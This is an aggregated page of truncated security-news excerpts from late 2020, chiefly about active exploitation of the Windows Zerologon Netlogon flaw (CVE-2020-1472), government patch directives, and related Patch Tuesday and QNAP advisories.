Threat attackers continue to exploit the Microsoft Zerologon vulnerability, a situation that’s been a persistent worry to both the company and the U.S. government over the last few months. Both on Thursday renewed their pleas to businesses and end users to update  Windows systems with a patch Microsoft released in August to mitigate attacks.
Despite patching awareness efforts, Microsoft said it is still receiving “a small number of reports from customers and others” about active exp...

Microsoft warns of ongoing attacks using Windows Zerologon flaw
BleepingComputer • Sergiu Gatlan • 29 Oct 2020

Microsoft today warned that threat actors are continuing to actively exploit systems unpatched against the ZeroLogon privilege escalation vulnerability in the Netlogon Remote Protocol (MS-NRPC).
"Microsoft has received a small number of reports from customers and others about continued activity exploiting a vulnerability affecting the Netlogon protocol (CVE-2020-1472) which was previously addressed in security updates starting on August 11, 2020," MSRC VP of Engineering Aanchal Gupta sa...

Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser
Fireeye Threat Research • by Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock • 28 Oct 2020

Throughout 2020, ransomware activity has become increasingly prolific, relying on an ecosystem of distinct but co-enabling operations to gain access to targets of interest before conducting extortion. Mandiant Threat Intelligence has tracked several loader and backdoor campaigns that lead to the post-compromise deployment of ransomware, sometimes within 24 hours of initial compromise. Effective and fast detection of these campaigns is key to mitigating this threat.
The malware families ena...

QNAP warns of new QTS bugs that allow take over of devices
BleepingComputer • Ionut Ilascu • 28 Oct 2020

QNAP today announced two vulnerabilities affecting QTS, the operating system powering its network-attached storage devices, that could allow running arbitrary commands.
The bugs are remotely exploitable and have been reported in versions of the software released before September 8, 2020.
The network-attached storage (NAS) device vendor does not provide too many details about the two issues but says that recent QTS releases include the necessary patches.
According to QNAP’s <...

Attackers chain Windows, VPN flaws to target US government agencies
welivesecurity • 13 Oct 2020

Threat actors have been chaining vulnerabilities in Windows and Virtual Private Network (VPN) services to target various government agencies, critical infrastructure and election organizations, according to a warning by the United States’ Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI). The technique, which involves exploiting several flaws over the course of a single attack to infiltrate an organization’s network, is part of the gangs’ ram...

October Patch Tuesday: Microsoft Patches Critical, Wormable RCE Bug
Threatpost • Tara Seals • 13 Oct 2020

Microsoft has pushed out fixes for 87 security vulnerabilities in October – 11 of them critical – and one of those is potentially wormable.
There are also six bugs that were previously unpatched but publicly disclosed, which could give cybercriminals a leg up — and in fact at least one public exploit is already circulating for this group.
This month’s Patch Tuesday overall includes fixes for bugs in Microsoft Windows, Office and Office Services and Web Apps, Azure Functions, ...

Election Systems Under Attack via Microsoft Zerologon Exploits
Threatpost • Lindsey O'Donnell • 13 Oct 2020

U.S. government officials have warned that advanced persistent threat actors (APTs) are now leveraging Microsoft’s severe privilege-escalation flaw, dubbed “Zerologon,” to target elections support systems.
Days after Microsoft sounded the alarm that an Iranian nation-state actor was actively exploiting the flaw (CVE-2020-1472), the Cybersecurity Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) published a joint advisory warning of further attacks.

Ransomware gang now using critical Windows flaw in attacks
BleepingComputer • Ionut Ilascu • 09 Oct 2020

Microsoft is warning that cybercriminals have started to incorporate exploit code for the ZeroLogon vulnerability in their attacks. The alert comes after the company noticed ongoing
attacks from cyber-espionage group MuddyWater (SeedWorm) in the second half of September.
This time, the threat actor is TA505, an adversary who is indiscriminate about the victims it attacks, with a 
 starting with the distribution of Dridex banking trojan in 2014.
Over the years, the actor...

Microsoft Zerologon Flaw Under Attack By Iranian Nation-State Actors
Threatpost • Lindsey O'Donnell • 06 Oct 2020

Microsoft is warning that an Iranian nation-state actor is now actively exploiting the Zerologon vulnerability (CVE-2020-1472), adding fuel to the fire as the severe flaw continues to plague businesses.
The advanced persistent threat (APT) actor, which Microsoft calls MERCURY (also known as MuddyWater, Static Kitten and Seedworm) has historically targeted government victims in the Middle East to exfiltrate data. Exploiting the bug allows an unauthenticated attacker, with network access ...

Microsoft: Iranian hackers actively exploiting Windows Zerologon flaw
BleepingComputer • Sergiu Gatlan • 05 Oct 2020

Microsoft today warned that the Iranian-backed MuddyWater cyber-espionage group was observed using ZeroLogon exploits in multiple attacks during the last two weeks.
The ongoing attacks exploiting the critical 10/10 rated CVE-2020-1472 security flaw were spotted by Microsoft's Threat Intelligence Center.
"MSTIC has observed activity by the nation-state actor MERCURY using the CVE-2020-1472 exploit (ZeroLogon) in active campaigns over the last 2 weeks," Microsoft
earlier to...

Zerologon Attacks Against Microsoft DCs Snowball in a Week
Threatpost • Tara Seals • 29 Sep 2020

A spike in exploitation attempts against the Microsoft vulnerability CVE-2020-1472, known as the Zerologon bug, continues to plague businesses.
That’s according to researchers from Cisco Talos, who warned that cybercriminals are redoubling their efforts to trigger the elevation-of-privilege bug in the Netlogon Remote Protocol, which was addressed in the August Microsoft Patch Tuesday report. Microsoft announced last week that it had started observing active exploitation in the wild: “W...

Microsoft clarifies patch confusion for Windows Zerologon flaw
BleepingComputer • Sergiu Gatlan • 29 Sep 2020

Microsoft clarified the steps customers should take to make sure that their devices are protected against ongoing attacks using Windows Server Zerologon (CVE-2020-1472) exploits.
The company revised the advisory after customers found Microsoft's original guidance confusing and were unsure if applying the patch was enough to protect vulnerable Windows Server devices from attacks.
In a step-by-step approach, the updated advisory now explains the exact actions that administrators need ...

Zerologon Patches Roll Out Beyond Microsoft
Threatpost • Tara Seals • 23 Sep 2020

The “perfect” Windows vulnerability known as the Zerologon bug is getting a patch assist from two non-Microsoft sources, as they strive to fill in the gaps that the official fix doesn’t address.
Both Samba and 0patch have issued fixes for CVE-2020-1472, which, as previously reported, stems from the Netlogon Remote Protocol, available on Windows domain controllers, which is used for various tasks related to user- and machine-authentication.
Exploiting the bug allows an unauthent...

Microsoft: Hackers using Zerologon exploits in attacks, patch now!
BleepingComputer • Lawrence Abrams • 23 Sep 2020

Microsoft has warned that attackers are actively using the Windows Server Zerologon exploits in attacks and advises all Windows administrators to install the necessary security updates.
As part of the
security updates, Microsoft fixed a critical 10/10 rated security vulnerability known as '
 | Netlogon Elevation of Privilege Vulnerability'.
This vulnerability has been named 'Zerologon' by cybersecurity firm Secura, and when exploited, allows attackers to
 and t...

DHS Issues Dire Patch Warning for ‘Zerologon’
Threatpost • Tom Spring • 21 Sep 2020

Federal agencies that haven’t patched their Windows Servers against the ‘Zerologon’ vulnerability by Monday Sept. 21 at 11:59 pm EDT are in violation of a rare emergency directive issued by the Secretary of Homeland Security.
With only hours until the deadline for the directive, issued on Friday, to be executed, what is at stake is a “vulnerability [that] poses an unacceptable risk to the Federal Civilian Executive Branch and requires an immediate and emergency action,” according...

Windows Exploit Released For Microsoft ‘Zerologon’ Flaw
Threatpost • Lindsey O'Donnell • 15 Sep 2020

Proof-of-concept (PoC) exploit code has been released for a Windows flaw, which could allow attackers to infiltrate enterprises by gaining administrative privileges, giving them access to companies’ Active Directory domain controllers (DCs).
The vulnerability, dubbed “Zerologon,” is a privilege-escalation glitch (CVE-2020-1472) with a CVSS score of 10 out of 10, making it critical in severity. The flaw was addressed in Microsoft’s August 2020 security updates. However, this week at...

Windows Zerologon PoC exploits allow domain takeover. Patch Now!
BleepingComputer • Lawrence Abrams • 15 Sep 2020

Researchers have released exploits for the Windows Zerologon CVE-2020-1472 vulnerability that allow an attacker to take control of a Windows domain. Install patches now!
As part of the August 2020 Patch Tuesday security updates, Microsoft fixed a critical 10/10 rated security vulnerability known as '
| Netlogon Elevation of Privilege Vulnerability'.
After successfully exploiting this vulnerability, attackers are able to elevate their privileges to a domain administrator and t...

Two 0-Days Under Active Attack, Among 120 Bugs Patched by Microsoft
Threatpost • Tom Spring • 11 Aug 2020

Two Microsoft vulnerabilities are under active attack, according the software giant’s August Patch Tuesday Security Updates. Patches for the flaws are available for the bugs, bringing this month’s total number of vulnerabilities to 120.
One of the flaws being exploited in the wild is (CVE-2020-1464), a Windows-spoofing bug tied to the validation of file signatures on Windows 10, 7 8.1 and versions of Windows Server. Rated “important,” the flaw allows an adversary to “bypass secur...

The Register

Administrators running Samba as their domain controllers should update their installations as the open-source software suffers from the same ZeroLogon hole as Microsoft's Windows Server.
An alert from the project confirms its code, in certain configurations, is also vulnerable to the CVE-2020-1472 bug, which can be exploited to gain domain-level administrator access. The vulnerability lies in the design of Microsoft's Netlogon Remote Protocol (MS-NRPC), which Samba inherited as it supports...

Microsoft Weekly Roundup: Windows 10, Ignite 2020, bugs and fixes
BleepingComputer • Mayank Parmar • 01 Jan 1970

In our first Microsoft weekly news roundup, we bring you the latest news regarding Windows 10, Microsoft, and this week's Ignite 2020 conference.



During Ignite 2020, Microsoft highlighted the new improvements coming to Windows 10's WSL, Microsoft Teams, Your Phone, and other products. In addition, Microsoft also acknowledged a new issue in September 2020 patch and offered fix for those getting WSL "Element not found" error.
Below is the list of top new features ...

Microsoft August 2020 Patch Tuesday fixes 2 zero-days, 120 flaws
BleepingComputer • Lawrence Abrams • 01 Jan 1970

Today is Microsoft's August 2020 Patch Tuesday, and while this is just a typical day for most of you, Windows administrators around the world want to pull their hair out.
With the release of the August 2020 Patch Tuesday security updates, Microsoft has released one Servicing Stack Update for Windows 10 advisory and fixes for 120 vulnerabilities in Microsoft products.
Of these vulnerabilities, 17 are classified as Critical, and 103 are classified as Important.
This release is...

QNAP warns of Windows Zerologon flaw affecting some NAS devices
BleepingComputer • Sergiu Gatlan • 01 Jan 1970

Network-attached storage device maker QNAP warns customers that some NAS storage devices running vulnerable versions of the QTS operating system are exposed to attacks attempting to exploit the critical Windows ZeroLogon (CVE-2020-1472) vulnerability.
"If exploited, this elevation of privilege vulnerability allows remote attackers to bypass security measures via a compromised QTS device on the network," QNAP explains in a security advisory published on Monday.
"The NAS may be expos...

Hackers used VPN flaws to access US govt elections support systems
BleepingComputer • Sergiu Gatlan • 01 Jan 1970

Government-backed hackers have compromised and gained access to US elections support systems by chaining together VPN vulnerabilities and the recent Windows CVE-2020-1472 security flaw.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) says that advanced persistent threat (APT) actors used this vulnerability chaining tactic to target federal and SLTT (state, local, tribal, and territorial) government networks, as well as election organizations, and critical infrastructure....

The Register

The rather concerning design flaw in Microsoft's netlogon protocol is being exploited in the wild by miscreants, the Windows giant's security team has warned.
The mega-biz today confirmed it is seeing active attacks abusing the CVE-2020-1472 vulnerability, aka ZeroLogon, which can be exploited to bypass authentication and gain domain-level administrator access in corporate networks.
The protocol-level hole affects Windows Server and other software that implements MS-NRPC to provide d...

The Register

Many memorable events get named, whether they're hurricanes, political events, or security incidents like the Morris Worm, which surfaced 32 years ago yesterday.
But named security incidents recently have editorialized their own importance with fear-mongering monikers like Heartbleed (2014), Meltdown, Spectre, and Foreshadow (2018), and Fallout and ZombieLoad (2019).
Not all do so. There have been less emotionally loaded bug names proposed, like CacheOut, CrossTalk, and RIDL, but nam...

The Register

If you're wondering which bugs in particular miscreants are exploiting to break into, or attempt to break into, US government networks, wonder no more. And then make sure you've patched them.
Uncle Sam's Dept of Homeland Security has this month identified at least six possible routes into the nation's computer systems, and the method used to gain total control over the machines once inside. Those six vulnerabilities are...
...plus CVE-2020-1472, aka ZeroLogon, in Microsoft Windows, w...

The Register

The US Cybersecurity and Infrastructure Security Agency (CISA) has taken the unusual step of issuing an emergency directive that gives US government agencies a four-day deadline to implement a Windows Server patch.
The directive, issued on September 18th, demanded that executive agencies to take “immediate and emergency action” to patch CVE-2020-1472, the CVSS-perfect-ten-rated flaw that Dutch security outfit Secura BV said allows attackers to instantly become domain admin by subvertin...

The Register

Uncle Sam's Cybersecurity and Infrastructure Security Agency (CISA) has taken the unusual step of issuing an emergency directive that gives US government agencies a four-day deadline to roll out a Windows Server patch.
The directive, issued on September 18, demanded that executive agencies to take “immediate and emergency action” to patch CVE-2020-1472, the CVSS-perfect-ten-rated flaw that Dutch security outfit Secura BV said allows attackers to instantly become domain admin by subvert...

The Register

Patch Tuesday Patch Tuesday used to be Microsoft's day to release patches. Now Adobe, Intel, and SAP are routinely joining the fun – with special guest star Red Hat this month.
If you've felt overwhelmed by the sheer number of security patches Microsoft has emitted this year, you are not alone. Patch watchers at the Zero Day Initiative said that, including the 120 product security bulletins posted this August, Microsoft is just 11 patches away from surpassing its 2019 full-year total wit...